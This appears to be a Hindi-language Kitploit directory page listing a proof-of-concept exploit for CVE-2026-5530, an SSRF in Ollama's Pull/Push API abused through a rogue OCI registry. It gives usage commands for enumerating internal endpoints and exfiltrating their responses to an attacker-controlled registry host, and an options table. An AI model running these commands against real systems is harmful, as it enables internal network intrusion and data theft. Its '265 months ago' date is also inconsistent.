Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-5530 — CVE-2026-5530 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Ollama के Pull/Push API में एक SSRF है, जो एक दुष्ट OCI रजिस्ट्री के माध्यम से आंतरिक एंडपॉइंट एन्यूमरेशन और पूर्ण प्रतिक्रिया एक्सफिल्ट्रेशन को सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/davidrxchester/cve-2026-5530
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनजानकारी एकत्र करना
GitHubdavidrxchester/cve-2026-5530

CVE-2026-5530

CVE-2026-5530 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Ollama के Pull/Push API में एक SSRF है, जो एक दुष्ट OCI रजिस्ट्री के माध्यम से आंतरिक एंडपॉइंट एन्यूमरेशन और पूर्ण प्रतिक्रिया एक्सफिल्ट्रेशन को सक्षम बनाता है।

रिपॉजिटरी देखें
265 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-5530

OCI रजिस्ट्री रीडायरेक्ट के माध्यम से Ollama SSRF, पूर्ण प्रतिक्रिया निष्कासन (exfiltration) के साथ।

विवरण (Writeup): https://davidrochester.com/posts/cve-2026-5530

प्रकटीकरण (Disclosure)

Ollama से कई बार संपर्क किया गया, लेकिन कोई प्रतिक्रिया नहीं मिली।

उपयोग (Usage)

तीन मोड: enum, exfil, और probe।

Enum

Ollama होस्ट से पहुंच योग्य लाइव आंतरिक एंडपॉइंट्स खोजता है।

python3 poc.py targets.txt --registry-host <your-ip>

Exfil

जब आप प्रतिक्रिया का आकार जानते हों, तो SSRF प्रतिक्रियाओं को निष्कासित (exfiltrate) करता है।

python3 poc.py http://internal:8500/v1/kv/?recurse --exfil --size 960 --registry-host <your-ip>

Probe

प्रतिक्रिया के आकार के लिए स्वचालित रूप से बाइनरी खोज करता है, फिर निष्कासित करता है।

python3 poc.py http://internal:8500/v1/kv/?recurse --probe --registry-host <your-ip>

विकल्प (Options)

target              URL या URL की फ़ाइल (प्रति पंक्ति एक, टिप्पणियों के लिए #)
-p, --port          दुष्ट रजिस्ट्री पोर्ट (डिफ़ॉल्ट: 9999)
--exfil-port        निष्कासन रजिस्ट्री पोर्ट (डिफ़ॉल्ट: 10000)
--exfil             निष्कासन मोड, --size की आवश्यकता है
--probe             आकार के लिए बाइनरी खोज, फिर निष्कासन
--size              Content-Length (--exfil के साथ आवश्यक)
--registry-host     आपका हमलावर IP/होस्टनाम जिसे Ollama पहुंच सकता है
--ollama            Ollama API URL (डिफ़ॉल्ट: http://127.0.0.1:11434)
टूल डाउनलोड करें